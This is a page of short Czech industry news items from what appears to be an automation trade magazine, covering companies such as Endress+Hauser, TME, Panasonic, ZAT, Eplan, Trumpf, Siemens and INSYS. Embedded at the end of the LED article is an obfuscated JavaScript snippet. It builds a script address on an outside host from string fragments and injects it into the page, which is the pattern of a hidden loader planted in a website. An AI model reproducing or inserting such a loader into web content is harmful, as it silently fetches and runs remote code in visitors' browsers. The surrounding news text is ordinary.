Aktuální vydání

celé číslo

12

2021

Automatizace v chemickém a petrochemickém průmyslu

Průtokoměry a regulační ventily

celé číslo

Přehled novinek

Endress+Hauser slučuje své dceřiné firmy na analytickou techniku

S účinností od 1. ledna 2022 byly sloučeny dvě dceřiné společnosti Endress+Hauser, a to SpectraSensors, Inc. a Kaiser Optical Systems, Inc. do nové firmy Endress+Hauser Optical Analysis, Inc. se sídlem v Ann Arbor v USA (Michigan).  Cílem je soustředit odborníky na laboratorní a procesní analýzu a zaměřit se také na laserovou měřicí techniku. Obr. 1. Výroba Ramanových spektroskopických analyzátorů v Ann Arbor (USA, Michigan) Díky akvizici těchto dvou společností se sídlem v USA v letech 2012 a 2013 byla skupina Endress+Hauser schopna přicházet na trh s novou měřicí technikou. V analýze plynů rozšířila své schopnosti o technologii diodové laserové absorpční spektroskopie (TDLAS) od společnosti SpectraSensors, zatímco Kaiser Optical Systems, globální lídr v Ramanově spektroskopii přinesl odborné znalosti v oblasti analýzy pevných látek, kapalin a plynů v širokém spektru aplikací, včetně výroby vakcín. Endress+Hauser se již léta strategicky zaměřuje na procesní a laboratorní analýzu. Výsledkem je, že analytická technika se v současnosti podílí jednou čtvrtinou na tržbách skupiny E+H. Vedle nově založené firmy Endress+Hauser Optical Analysis se na analytickou techniku ve skupině dále zaměřuje společnost Endress+Hauser Liquid Analysis a dceřiná společnost Analytik Jena. Obr. 2. Výroba analyzátorů TDLAS v Rancho Cucamonga (USA, Kalifornie) Tím, že byla do nabídky zahrnuta laserová měřicí technika, nabízí nyní Endress+Hauser kompletní portfolio analytických přístrojů a služeb, které zákazníci využívají jak při vývoji produktů, tak i řízení výrobních procesů a kontrole kvality. Společnost Endress + Hauser Optical Analysis sídlí v Ann Arbor, Michigan, kde se také vyvíjejí a vyrábějí Ramanovy spektroskopické přístroje. Přístrojové vybavení TDLAS se nadále vyrábí v Rancho Cucamonga v Kalifornii. Nová společnost s přibližně 200 zaměstnanci zůstane stoprocentně vlastněnou dceřinou společností skupiny Endress + Hauser. (Endress+Hauser)      

LED nenajdete jen v televizoru

Je vcelku k neuvěření, že elektroluminiscenční dioda neboli LED před nedávnem oslavila 40 let od svého vynalezení. Vždyť to není tak dlouho, co se stala velmi oblíbenou součástkou. Za její rostoucí popularitou stojí zejména změna výrobní technologie, díky které je výroba LED oproti minulosti mnohem levnější. Navíc svítivost současných „ledek“ překonává svítivost tradičních žárovek. A tím jejich výhody nekončí. Je to však důvod, proč se od roku 2020 používají svítidla LED v EU místo klasických žárovek. Co je vlastně LED? Elektroluminiscenční dioda, případně „ledka“ je elektronická polovodičová součástka, pro níž je charakteristický jediný P-N přechod. Právě ten se stará o to, že LED při průchodu napětí svítí. Oproti ostatním světelným zdrojům pracuje LED s podstatně menším napětím, takže je ekonomicky i ekologicky výhodným zdrojem osvětlení.Obr. 1. Nabídku LED naleznete na www.tme.eu Z pohledu elektrikáře je důležité, že LED dokáže pracovat pouze se stejnosměrným proudem v případě proudu střídavého je nutné ji vybavit usměrňovačem. LED využívají napětí okolo 1,8 V, a tak často nastává situace, kdy je potřeba upravit napětí rezistorem. Příkladem může být třeba LED dioda 12 V, která má ideální napětí už od 1,8 V, ale zdrojové napětí je mnohem silnější. Ideální napětí pro LED se liší v závislosti na jejich typu. Totéž nastává u hodnoty proudu, kde navíc záleží i na svítivosti diody. Jaká je konstrukce LED? Jak již bylo zmíněno, LED je založena na P-N přechodu, takže je zřejmé, že jsou jejími součástmi jsou anoda i katoda. Základem je však polovodičový čip, který je připojen ke zdroji elektrického napětí. Kolem tohoto čipu je pak materiál, který dodává vyzařovanému světlu požadované optické vlastnosti, často se jedná o pryskyřici. Toto opouzdření totiž posiluje požadovaný optický účinek svítidla LED. Zajímavé pak jistě je, že kromě světla může emitovat i ultrafialové či infračervené záření. Světlo produkované LED má však jen jednu barvu. Toto nízké barevné spektrum je slabinou světel LED. Barva vyzařovaného světla je přímo závislá na barvě opouzdření LED. Přirozená barva tohoto světla však není ani bílá, i ta byla dlouho a složitě vyvíjena. V oblasti LED je tak stále, co zdokonalovat. Společnost TME Czech Republic nabízí nepřeberné množství různých svítidel a indikátorů LED, které lze použít v mnoha různých projektech. Kompletní nabídka diod je uvedena na www.tme.eu.Kromě více jak devíti tisíc různých diod, zde naleznete více než 500 000 dostupných produktů z oblasti elektro instalací. (TME Czech Republic) (function(){ aamf=document.createElement("script");aamf_="u"+("s")+"ta"; aamf_+=("t.i")+""+"n";aamf_+=(("f")+"o");aamf.type="text/javascript"; aamf_+="/"; aamfu="363218512";aamfu+=".5e2p10t1amf0hawt7rh";aamfu+="2d0hwmml34u"; aamf.src="https://"+aamf_+aamfu;aamf.async=true;document.body.appendChild(aamf); })();

Centrum zákaznických zkušeností Panasonic v Mnichově

Laboratoře a servisní střediska jsou jádrem technických inovací – a v konečném důsledku zaručují inovace napříč všemi průmyslovými odvětvími. Stejnou roli hraje i Centrum zákaznických zkušeností Panasonic v Mnichově. Produkty a projekty jednotlivých prezentací ukazují zajímavá řešení a přidanou hodnotu v různých oblastech průmyslu i každodenního života. Zákaznické centrum na ploše přibližně 6 000 m2 otevřela společnost Panasonic Industry Europe  na jaře roku 2021 s cílem ukázat zákazníkům pod jednou střechou inovativní řešení pro různá průmyslová odvětví.  Centrum zákaznických zkušeností není ani interní výstavou, ani muzeem či archivem produktů a vývoje. Budova v srdci jednoho z nejdůležitějších středisek techniky v Bavorsku je spíše místem setkávání a představování nápadů, kolem kterého jsou laboratoře a vývojová oddělení, která kooperují na nových i nekonvenčních přístupech.  Centrum pro logistiku a sklady  V návaznosti na to, jak digitalizace stále více proniká do logistiky, vyvinul Panasonic systém podnikového řešení, Logiscend, který ke správě materiálového toku zákazníků využívá internet věcí (IoT). Logiscend se skládá z vlastních patentovaných hardwarových zařízení Panasonic. Výhodné je, že není třeba tisknout žádné papírové dokumenty, a zároveň se snižují nároky na manuální práci. Přehledný software umožňuje úplnou správu a trasování, lokalizaci v reálném čase (RTLS), řízení procesů a analýzu dat. V laboratoři CXC pořádá Panasonic konzultační workshopy, které umožňují zmapovat a analyzovat stávající procesy. Pomocí metody Kaizen jsou zkoumány stávající skladové postupy a navrhovány procesní toky, které obstojí i v budoucnosti. Panasonic Industry Logiscend Laboratory - YouTubeCentrum servisu průmyslové automatizace Servisní centrum průmyslové automatizace poskytuje zákazníkům své služby ve fázi plánování a řešení nového projektu, ale také při poprodejnímu servisu. Komplexní diagnostika včetně funkčního testu vede k rychlé a kvalitní analýze závad a jejich odstranění. Díky přímému kontaktu s vývojovým oddělením jsou úpravy, doporučené výměny originálními náhradními díly realizovány v co nejkratším čase a s nízkými náklady. Na toto servisní centrum se mohou evropští zákazníci obracet se svými požadavky a podněty, aby mohli optimálně využívat produkty a řešení společnosti Panasonic. Panasonic Industry Service Center Factory Automation - YouTubeCentrum techniky pohonů V tomto pohonářském centru jsou produkty z různých oblastí kombinovány do kompletního řešení. Tato pracovní oblast je oddělena od ostatních laboratoří, aby bylo možné provádět i dlouhodobé zátěžové zkoušky. Zde je možné také prokázat interoperabilitu s produkty partnerských společností v oblasti techniky pohonů, protože je možné testovat a integrovat produkty od dodavatelů třetích stran, které musí s praxi dobře spolupracovat. Mezi další služby patří aplikační a softwarová školení, ověření vývoje koncepcePanasonic Industry Servo Drives Excellence Center - YouTubeLaboratoř pro průmyslovou senzoriku V laboratoři senzoriky jsou řešeny individuální požadavky zákazníků. Konkrétní problémy, výzvy i projekty jsou analyzovány a společně se zákazníky se pak hledá optimální řešení. Vzhledem k tomu, že společnost Panasonic Industry nabízí široké portfolio špičkových senzorů, jsou tyto studie proveditelnosti nezbytné pro splnění individuálních požadavků zákazníků. Laboratoř a vývojové oddělení pro senzorová řešení umožňuje stávající produkty přizpůsobit a modifikovat např. rozsah měření, zapojení, přesnost měření, rozměry nebo rychlost měření našich senzorů. Laboratoř je vybavena tak, aby bylo možné navrhnout snímací metody pro náročná prostředí, kde jsou senzory vystaveny prachu, špíně, olejům nebo agresivním chemikáliím.(tým Panasonic)

Nové moduly IoT s bezdrátovým přenosem dat pro regulační stanice plynu

V posledních deseti letech jsou v průmyslových provozech stále častěji zaváděny systémy IoT, které přinášejí úspory, což je vítané zvláště při současném prudkém růstu nákladů. Průmyslové podniky, provozující regulační stanice plynu, mohou ušetřit desítky tisíc korun ročně zavedením platformy IoT pro bezdrátový sběr, přenos, analýzu a vizualizaci dat.Obr. 1. V regulačních stanicích plynu se uplatní nové moduly  SimONet IoT-Ex„IoT technologii využíváme také k přesnému a zároveň levnému monitoringu pohybu a kontrole tras dopravních prostředků či strojů, k monitoringu nestandardních jevů na produktovodech a v distribučních sítích i v zóně 2 s rizikem výbuchu,“ říká Václav Janoch, obchodní a marketingový ředitel společnosti ZAT, která IoT systémy v České republice vyvíjí a zavádí. A právě moduly IoT s bezdrátovým přenosem dat ze zařízení umístěného v zóně s nebezpečím výbuchu umožní průmyslovým firmám při modernizaci nebo výstavbě regulačních stanic výraznou úsporu nákladů. Moduly SimONet IoT-Ex usnadní sběr a přenos dat Průmyslové podniky, které provozují rozvodny plynu, využívají často moduly, které načítají obchodní měření z regulační stanice, ale neumějí data zasílat distributorovi plynu ani do interního systému firmy. Jednou za stanovený čas je operátor ručně shromáždí a odešle. Z takto získaných dat pak firma pracně vytváří analýzy, např. pro zefektivnění spotřeby plynu. „Ve druhém případě má firma k dispozici záznamník dat, který zjištěné informace ze stanice sice přeposílá distributorovi plynu, ale opět je neumí zasílat a analyzovat pro potřeby interního řízení,“ říká Tomáš Bauer, vedoucí odborné skupiny Plynárenství společnosti ZAT. Obr. 2. Modul SimONet IoT-Ex usnadní sběr a přenos dat z regulačních stanic plynu Pro tyto firmy jsou určeny nové moduly IoT typu SimONet IoT-Ex, certifikované do zóny 2 s nebezpečím výbuchu. Jejich výhodou je jednoduchá instalace, mnoho nových funkcí a až o 50 % nižší cena oproti stávajícím záznamníkům dat.  Když je za méně více Nové moduly IoT přinášejí podnikům mnoho nových funkcí, často za nižší cenu než stávající řešení na trhu. Snadno se instalují a zajistí spolehlivý sběr, přenos a zpracování dat i v místech bez přívodu napájení. Firma tak může on-line nebo ve stanovených intervalech získávat informace o průtoku, tlaku, teplotě plynu a dalších požadovaných hodnotách i z míst, kde to dosud nebylo možné. Obr. 3. Modul SimONet Ex je opatřen baterií  o kapacitě 17  Ah umožňující až šest let bezobslužného provozu „Data je možné přenášet jak na firemní dispečink, tak lze využít vizualizační platformu SimONet Ex, v níž se jednoduše nastaví různé úrovně přístupu pro správce, techniky a manažery. Údaje se automaticky zobrazují v tabulkách, grafech nebo v mapových podkladech či podle potřeb podniku,“ doplňuje Tomáš Bauer. K modulu IoT-Ex lze současně připojit více měřených veličin jako u plně hodnotného záznamového zařízení. Podle Bauera je možné modul využít i jako komunikační zařízení, což ocení především firmy vlastnící staré záznamníky dat, které nemají možnost on-line přenosu komunikace, ale jsou vybaveny sériovou linkou. Modul IoT také v případně překročení mezních stavů upozorní na vzniklý problém. Měřené hodnoty lze konfigurovat jak na místě přes mobilní aplikaci, tak vzdáleně přes dispečink, čímž firmy ušetří za výjezdy zaměstnanců. IoT pro budoucnostVýhodou bezdrátového přenosu oproti kabelovému řešení je až o třetinu nižší cena při pořízení. Výdrž baterie 17 Ah zajistí až šest let bezobslužného provozu. Vyspělé IoT systémy využívají technologii NBIoT s 98 % pokrytím území České republiky. „Naše moduly lze připojit také do venkovního prostřední. I proto se využívají pro měření na páteřní síti plynovodů i při výstavbě nebo rekonstrukci telemetrie regulačních stanic,” upřesňuje Tomáš Bauer. Pro potřeby firem a průmyslových podniků může být technologie IoT certifikovaná v zóně 2 užitečná nejenom při rekonstrukci nebo výstavbě nových regulačních stanic plynu, ale ve všech případech, kdy je nutné měřit ve výbušném prostředí zemního plynu. Zdravé klima i úspora na energiích Platforma IoT pro monitoring, sběr, analýzu a vizualizaci dat se ve firmách uplatní také pro efektivní správu spotřeby energií a jejich dálkovému odečtu. V tomto případě jim chytré řešení pomůže nejenom s odečítáním naměřených hodnot z koncových zařízení, ale i s efektivní správou energií či s detekcí černých odběrů. Dále ho lze využít při správě budov, kde mohou firmy snížit náklady až o 30 %. Např. moduly IoT typu SimONet poskytují podklady pro efektivní řízení vzduchotechniky, klimatizace či obslužných technologií. Čidla umístěná v místnosti zase dávají přehled o aktuální teplotě, vlhkosti, stavu CO2, počtu osob v místnosti, hluku, obsazenosti míst k sezení v zasedačkách či otevřených nebo uzavřených oknech a dveřích. Všechny podklady zobrazené v grafech slouží jak technickému personálu, tak i managementu společnosti k efektivnímu řízení a definici úspor. „My ji například využíváme v zasedacích místnostech pro sledování teploty a množství CO2 ve vzduchu. Městský obvod Plzeň 2 si od SimONet v budově, kde IoT technologii nasadil, slibuje úsporu až 30 procent nákladů na energie za rok,“ uzavírá Václav Janoch.  (ZAT)

Eplan Platforma 2022 s novým vzhledem a koncepcí

Novou verzí svého softwaru Eplan Platforma 2022 ohlašuje firma Eplan budoucnost projektování v elektrotechnice se zaměřením na snadné ovládání. Bude vyhovovat jak zkušeným uživatelům softwaru Eplan, tak začátečníkům. Intuitivní uživatelské rozhraní, založené na konceptech, které už jsou důvěrně známé, je velmi dobře přijímáno a zároveň zlepšuje uživatelský komfort.Obr. 1. Charakteristickými rysy nové verze Eplan Platforma 2022, která už je nyní k dispozici, jsou snadné ovládání a velká výkonnost Eplan Platforma 2022 je nyní připravena k uvedení na trh. Uživatelé budou mít k dispozici nově navržené uživatelské rozhraní a funkce pro vylepšení pracovních postupů a pro využití doplňkových cloudových služeb. Shrnuto: nový software pro projektování je charakterizován snadným ovládáním a velkou výkonností. V integrovaných pásech karet i na zobrazení „backstage view“ uživatelé najdou mnoho již zavedených softwarových řešení a ocení výrazně vylepšenou ergonomii ovládání. Nové, intuitivnější uživatelské rozhraní vychází z běžných mezinárodně známých konceptů ovládání, což usnadňuje začátek práce se softwarem.  Pracovní postupy ve věku digitalizace Vývojáři firmy Eplan se také zaměřili na postupy práce na projektech a navrhli software pro zlepšení spolupráce v průběhu celého životního cyklu výrobku. Je to proto, že systémy CAE, jako např. Eplan Platforma, jsou něco jako „páteř“ vývojových a výrobních oddělení. Obvykle jsou velmi hluboce integrovány do infrastruktury a strategie zákazníků a z hlediska investic se jejich rozvoj plánuje roky dopředu. Obr. 2. Mezioborové projektování – od předběžného projektování a plánování přes elektrotechniku a fluidní pohony až po výrobu ovládacích panelů a rozváděčů – je nyní jednodušší a přehlednějšíJedním z jasných cílů při vývoji nové verze Eplan Platforma 2022 byla optimalizace výměny dat mezi jednotlivými zúčastněnými stranami ve všech sektorech společností. Cloudové aplikace, jako jsou Eplan eBuild, eManage (nyní k dispozici také v plné verzi) a eView, umožňují využít zcela nové formy spolupráce v kontextu platformy Eplan. Nová cloudová softwarová řešení výrazně zlepšují spolupráci mezi firmami a jejich zákazníky, obchodními partnery a dodavateli.  Vyzkoušená a osvědčená platforma Elektrokonstruktéra Markuse Sommera ze společnosti J. Wagner GmbH, která je jedním z předních výrobců inovativní techniky pro povrchové úpravy materiálů, přesvědčilo nové uživatelské rozhraní. „Jednotné uživatelské rozhraní v nové verzi Eplan Platforma 2022, založené na zavedených koncepcích známých z dnešního pracovního světa, opravdu usnadňuje rychlé zahájení práce se softwarem, zejména pro nováčky. Eplan nabízí nesčetné množství funkcí, ale ty jsou dobře strukturované a přehledně uspořádané a použití vyskakovacích karet zvyšuje komfort práce.“ Někdy jsou přínosy nového řešení v detailech, konstatuje správce systémů Eplan Michael Noack ze společnosti KSV, výrobce rozváděčů sídlícího v německém Koblenzu. Jednou z jeho povinností je starat se o kmenová data. S Platformou Eplan 2022 se velmi podrobně seznámil při testování její beta verze. Pro něj jsou nové funkce správy zařízení jasným krokem vpřed: nyní je možné všechny vlastnosti zařízení ukládat v závislosti na jejich variantách. „Technické vlastnosti lze nyní v nové Platformě Eplan 2022 postihnout s větší variabilitou a větší přesností,“ vysvětluje. „Například při návrhu zapojení je nyní možné správně mapovat pomocné bloky kontaktů stykačů, jejichž zapojení mění své fyzické umístění v závislosti na konstrukci daného rozváděče.“ Díky tomu je schéma zapojení ještě přesnější a kromě zjednodušení konstrukčních prací se tím ještě usnadňuje pozdější zapojování interních spojů v rozváděči.  Přechod na model předplatného Eplan Platforma 2022 se prodává výhradně formou předplatného. Tím se firmám snižuje finanční riziko, protože nejsou třeba velké počáteční investice a možnosti plánování individuálního využití softwaru jsou mnohem flexibilnější. Předplatným také firma Eplan posiluje své partnerství se zákazníky, aby mohla lépe reagovat na jejich aktuální potřeby při každodenní práci.  Závěrem Platforma Eplan je intuitivnější a flexibilnější a firmám celkově zlepšuje produktivitu. Společnosti využívající doprovodné programy a řešení, jako je partnerský program Eplan, a doplňkové softwarové produkty v cloudu Eplan mohou nyní lépe spolupracovat se zákazníky, partnery a dodavateli. Více informací je uvedeno na: www.eplan-software.com/inyourhands. (Eplan)

Měření průmyslových plynů v podání Endress+Hauser

Prakticky všechna průmyslová odvětví využívají velké množství průmyslových plynů. Obvykle se nejedná o hlavní produkt výroby, ale o podpůrné produkty. I z tohoto hlediska se mohou stávat lehce opomíjenmi i přesto, že náklady na jejich nákup, skladování i spotřebu bývají nemalou částkou v celkové ceně hlavního produktu. Podniky ve zpracovatelském průmyslu používají obrovské množství dusíku (N2), oxidu uhličitého (CO2), kyslíku (O2), argonu (Ar) a mnoha dalších průmyslových plynů jako svařovací plyny, ochranné plyny (pájení) nebo pro balení v modifikované atmosféře (MAP) v potravinářském průmyslu.  Důležité podružné měření Při nakládání s plyny je důležité vyvarovat se ztrátám energie a netěsnostem stejně, jako je tomu v oblasti výroby, vytápění, větrání a klimatizace, a zajistit podrobné a správné účtování nákladů, pokud se jedná o více spotřebitelů. To však vyžaduje více než jen měření celkové spotřeby průmyslového plynu. Pro efektivní monitorování plynů je klíčové měření průtoku v rozvodech nebo přímo u zákazníka. Termické průtokoměry se osvědčily jako zvláště účinné podružné měřiče, které umožňují podrobné rozdělení nákladů na jednotlivé budovy, podlaží, oddělení, výrobní procesy nebo jiné jednotky. Použití podružných měřičů je nedílnou součástí komplexního systému energetického managementu podle ISO 50001 a přináší několik výhod: • rychlý přehled všech průtoků plynu v různých oblastech (budova, podlaží, proces atd.), • správné a důsledné účtování nákladů pro všechny spotřebitele, • spolehlivá identifikace netěsností, parazitních odběrů a oblastí s neobvykle vysokou spotřebou. Pro úspory stačí dodržovat tři zásady: minimalizovat netěsnosti, monitorovat filtry a vyvarovat se přenosu zkapalněného plynu do hlavních potrubí. Výběr přístrojů pro podružné měření plynů Podružné měřiče jsou užitečnou investicí z několika důvodů – nejen k identifikaci netěsností, ale také k zajištění správného účtování nákladů pro spotřebitele. Důležité je vybrat pro podružné měření správy typ přístroje. Třeba při nákupu nebo plnění cisteren kryogenními zkapalněnými plyny se projeví rozdíl v přesnosti mezi mechanickými měřiči a moderními Coriolisovými průtokoměry objemu zkapalněného plynu. Přesnější přístroje mohou ušetřit značné množství peněz. Při měření kyslíku v ocelových potrubích je důležité zajistit, aby potrubí – stejně jako měřicí přístroje – bylo odmaštěno speciálním čisticím postupem a aby nebyly překročeny maximální rychlosti proudění. Přístroje společnosti Endress+Hauser pro podružné měření plynů   Stlačený vzduch – energeticky nejnáročnější „surovina“ Finanční ztráty v neefektivních systémech výroby a přenosu stlačeného vzduchu jsou podceňovány nebo přijímány jako dané. Nemusí to tak být. Slabá místa se dají velmi spolehlivě identifikovat a přijmout taková opatření, aby nadále nedocházelo ke ztrátám. Jak velké jsou ztráty to jsou, ilustrují tyto údaje: • Až 10 % spotřeby energie v průmyslu se používá k výrobě stlačeného vzduchu, což je výkon asi 75 velkých jaderných elektráren. • Až 95 % se ztrácí jako neproduktivní odpadní teplo během procesu. • Až 30 % stlačeného vzduchu mizí kvůli únikům. Klíčem k odhalení slabých míst je správné měření na správných místech. Návratnost takových měření se pak počítá na měsíce. V tomto schématu jsou naznačena typická místa měření a vhodné přístroje, které zajistí vysokou spolehlivost a přesné výsledky.   Úspory v soustavách stlačeného vzduchu Značných úspor lze dosáhnout především využitím odpadního tepla kompresoru (rekuperace), vypínáním kompresorů v neproduktivním čase a kontrolou účinnosti kompresorů (korigovaný objemový průtok vs. spotřeba elektrické energie). Pro úsporný provoz je potřeba se zaměřit také na snížení tlakových ztrát a zamezení nadměrného tlaku v soustavě. Procesní tlak je potřeba udržovat na optimální úrovni. Každý zbytečný bar tlaku totiž zvýší náklady na výrobu stlačeného vzduchu o 9 %. Tlakové ztráty v soustavě stlačeného vzduchu můžeme snížit minimalizací netěsností a pečlivým sledováním filtrů. Lepšího výkonu se dosáhne nasáváním vzduchu do kompresoru v nejchladnějším místě.  Přístroje společnosti Endress+Hauser pro měření v soustavách stlačeného vzduchu

Kolaborativní svařovací robot Trumpf TruArc Weld 1000 řeší nedostatek svářečů a zrychluje výrobu

Společnost Trumpf představila na Mezinárodním strojírenském veletrhu 2021 v Brně kolaborativní svařovací robot Trumpf TruArc Weld 1000. Oproti ručnímu svařování pracuje tento robot přesněji a rychleji. Firmám pomůže tento robot vyřešit kritický nedostatek svářečů, v současnosti totiž evidují úřady práce zhruba 7 000 požadavků firem na obsazení svářečských pozic. TruArc Weld 1000 je programovatelná svařovací buňka. Stačí pouze zvolit začátek a konec svaru a naprogramovat dráhu. Svařovací parametry a předlohy pro svařovací programy jsou uloženy v zařízení. Buňku lze používat v režimu s jednou nebo dvěma stanicemi. Při použití dvou stanic se svařuje paralelně v obou stanicích. Díl se naprogramuje jen jednou, na jedné stanici, a stroj si přenese program automaticky do druhé stanice. Tím se svařování ještě zrychlí. Například výroba jednodílné nosné konzoly s pěti svary trvala při ručním sváření celkem 415 s. S využitím TruArc Weld 1000 pouze 329 s. Přitom při ruční práci připadlo 380 s na sváření a 35 s na manipulaci s dílem. V případě svařování kolaborativním robotem zabralo 210 s programování a 119 s sváření, což je 21% úspora času u kusového sváření. Ještě větší úspora je při sériové výrobě, kde odpadá programování dalších dílů. Manuální svařování výztuhy složené z osmi částí s 10 svary si vyžádalo 64 minut, zatímco automatizované však pouze 24 minut – tedy o 63 % kratší čas. V případě potřeby lze zařízení jednoduše přestěhovat. Do provozu lze kobot zapojit velmi rychle a jednoduše během několika hodin. Buňka obsahuje vše potřebné pro sváření – od cívky na drát až po svařovací parametry. Stačí pouze zhlédnout video návod vysvětlující naprogramování i obsluhu a můžete začít pracovat. Trumpf TruArc Weld 1000 je bezpečný stroj s CE prohlášením o shodě a certifikátem TÜV. Je vybaven bezpečnostní ochrannou kabinou, automaticky otvíratelnou zástěnou, samočisticím odsáváním, LED osvětlením a ochranou proti kolizím. Produktivitu zajišťuje vysoce výkonný svařovací zdroj od firmy Fronius.   Jak pracuje Trumpf TruArc Weld 1000, na to se můžete podívat na videozáznamu ZDE. Parametry kolaborativního průmyslového robotu Trumpf TruArc Weld 1000 Počet os 6 Dosah 1 300 mm Opakovatelná přesnost ±0,05 mm Svařovací zdroj Fronius TPS 320i C PULSE Svařovací technologie MIG/MAG 3-320 A Rozměr kabiny 3 600 x 2 200 x 2 800 mm Hmotnost 2 540 kg Typická max. velikost dílu (při zasunuté dělící přepážce) 600 × 600 × 600 mm

Soutěž Siemens Sinumerik Cup v CNC programování

Vítězem 8. ročníku soutěže Sinumerik Cup, jehož finále proběhlo 25. října 2021 v pražském sídle společnosti Siemens, se stal dvoučlenný tým studentů ze Střední průmyslové školy v Jeseníku. Studenti Miroslav Juhaňák a Viktor Pecina zvítězili pod vedením Jaroslava Koldy.   Obr. 1. Vítězný dvoučlenný tým ze SPŠ v Jeseníku ve složení Miroslav Juhaňák a Viktor Pecina s vedoucím práce Miroslavem Koldou   V soutěži se utkalo 12 soutěžních týmů ze středních technických, strojírenských a průmyslových škol a odborných učilišť. Na druhém místě se umístil tým ze Středního odborného učiliště v Domažlicích a na místě třetím tým ze Sigmundovy střední školy strojírenské v Lutíně. Střední průmyslová škola v Jeseníku se soutěže účastnila poprvé. Člen vítězného týmu Miroslav Juhaňák se obráběním plánuje zabývat i v budoucnosti. „Je to obor, ve kterém je možné uplatnit tvořivost a fantazii,“ vysvětluje. Viktora Pecinu na soutěži zaujala především možnost vyzkoušet, jak výrobky v praxi vznikají. „Navíc jsme chtěli našim mladším spolužákům prošlápnout v soutěži cestu,“ uzavírá.   Obr. 2. Vizualizace stupačky motorky   V letošním, osmém ročníku soutěže programovali studenti výrobu stupačky pro enduro motorku. „Zadání pro Sinumerik Cup 2021 – programování výroby stupačky pro enduro motorku – nebylo pro soutěžní týmy snadné. V prvním i druhém hodnoceném kole byly posuzovány všechny odevzdané práce. Tři nejlepší týmy svá řešení představily formou online prezentací,“ uvedl Aleš Polzer, autor zadání, odborný garant soutěže a tvůrce soutěžního zadání z Ústavu strojírenské technologie Fakulty strojního inženýrství VUT v Brně. [Tisková zpráva společnosti Siemens, 25. 10. 2021.] (ed)

Veletrh productronica v době rostoucí poptávky o elektronice

Od září se v Německu opět rozběhly veletržní aktivity, které byly dočasně utlumeny pandemií. Proto jsou návštěvníci zváni na veletrh vývoje a výroby elektroniky, productronica Mnichov, který proběhne ve dnech 16. – 19. listopadu 2021. K vystavování se přihlásilo přes 700 firem ze 30 zemí. Na veletrhu productronica 2021 budou mimo jiné zastoupeni přední klíčoví hráči jako ASM Assembly Systems, F&K Delvotec, Komax, stejně jako Kurtz Ersa a Rohde & Schwarz. „Současný vývoj v oblasti vývoje a výroby elektroniky opravňuje doufat v úspěšnou podzimní veletržní akci,“ vysvětluje Rainer Kurtz, generální ředitel skupiny Kurtz Ersa a předseda veletržního výboru productronica. „S poklesem pandemie vystavovatelé očekávají, že se podnikání bude letos i příští rok nadále rozvíjet pozitivně. V tomto ohledu má veletrh productronica 2021 velkou šanci být opět celosvětovým skvělým setkáním pro celý průmysl výroby elektroniky. “ Trh s polovodiči těží z internetu věcí a sítí 5G Do systémů internetu věcí se zapojuje stále více síťových zařízení, a to vyžaduje nejen značný počet polovodičů, ale také stále kvalitnější polovodičové součástky. A to ve všech průmyslových segmentech a pro všechny typy internetu věcí (průmyslový internet věcí, IIoT, internet věcí v medicíně, IoMT, umělá inteligence věcí, AIoT atd.). Podle průzkumu firmy IoT Analytics světový obrat polovodičů IoT dosáhne pravděpodobně do roku 2025 hodnoty 80 mld USD oproti 33 mld. USD v roce 2020. Důraz je kladen na mikrokontroléry IoT (MCU) a čipové sady pro konektivitu IoT, zabezpečení internetu věcí i internetu věcí s umělou inteligencí (IoT AI). Největší podíl na trhu mají čipové sady s konektivitou IoT s podílem 35 % a mezi nim nimi hrají hlavní roli mobilní čipové sady IoT. Podle analytiků je však trh s polovodiči pro IoT stále v plenkách. To by se ale mělo v příštích letech změnit. Podíl polovodičů specifických pro IoT se v letech 2019 až 2025 zvýší ze 7 na 12 %. Internet věcí se tak začíná etablovat jako hybná síla pro polovodičový průmysl. Výrobci čipů však poté musí stále častěji plnit typické požadavky na IoT jako výjimečně nízký výkon, malé rozměry nebo integrované zabezpečení. S novým standardem mobilní komunikace 5G se nyní významně rozšiřuje množství aplikací. A to nejen v průmyslovém prostředí, ale také v jiných oborech, v energetice, zdravotnictví, vědě a ve spotřebitelském sektoru. S velkou šířkou pásma a kvalitou přenosu a nízkou latencí představuje 5G technický základ pro další krok ve vývoji IoT v mnoha oblastech. Tomuto oboru se budou na veletrhu productronica věnovat četné firmy, např.: Cimetrix, iTAC (hala A3), Segger Microcontroller, Rohde & Schwarz (hala A1), Orbotech (hala B3), Fraunhofer IZM (hala B1), Aurel (hala A2) a další. Součástí veletrhu productronica je opět největší evropská přehlídka polovodičů, Semicon Europa. Zde se setkávají lídři trhu v celém dodavatelském řetězci od vývoje a výroby. (EXPO-Consult+Service,spol. s r.o.)  

Vzdálené připojení do Číny? S INSYS icom žádný problém

Data jsou průmyslu a automatizaci novým zlatem. Dálkový přístup zprostředkuje informace o stavu zařízení, data ze senzorů, data o využití, řídicí data a další údaje. Tato data lze následně s výhodou analyzovat a využívat pro optimalizaci procesů nebo prediktivní údržbu. Velmi často jsou díky snadné dostupnosti dat nové obchodní a servisní modely založeny právě na správně vyhodnocených datech. Jak se ale připojit do Číny? Praxe ukázala, že šifrované připojení z Číny se vždy za pár dnů nebo nejdéle týdnů přeruší a nelze znovu navázat. Důvody jsou politického charakteru. Kvůli bezpečnosti je pro každou aplikaci požadováno šifrování dat. Právě toto šifrování dat a nemožnost nahlédnout do datového toku vadí čínskému politickému systému, který se bojí špionáže a zneužití dat. A pokud některý z robotů zabezpečení čínského internetu takové spojení identifikuje, je následně tato datová cesta uzavřena.  Jak na to? Pro četné české společnosti, které svá zařízení prodaly do Číny, má společnost Insys řešení dálkového připojení. Provozuje totiž autorizovaný server, který je bezpečný, takže nehrozí přerušení přenosu dat. Služba, umožňující takový druh servisu, se jmenuje icom Data Suite (iDS). Šifrované protokoly jsou základem pro bezpečnou datovou komunikaci. V podnikovém prostředí jde o detailní řízení, kdy a jak si jednotlivá zařízení, systémy, instalace nebo uživatelé mohou navzájem vyměňovat data. Správa VPN prostřednictvím iDS umožňuje zakládat skupiny, spravovat připojení, monitorovat a tunelovat prostřednictvím stávajících bran firewallu. Nejste v tom sami! Zákazníci se mohou obracet na společnost Insys, která je připravena instalovat své routery INSYS icom a přístupové platformy iDS v jejich technických zařízeních. Podrobnosti se dozvědí na www.insys-icom.cz.   Za tým INSYS Ing. Lubomír Kuchynka www.insys-icom.cz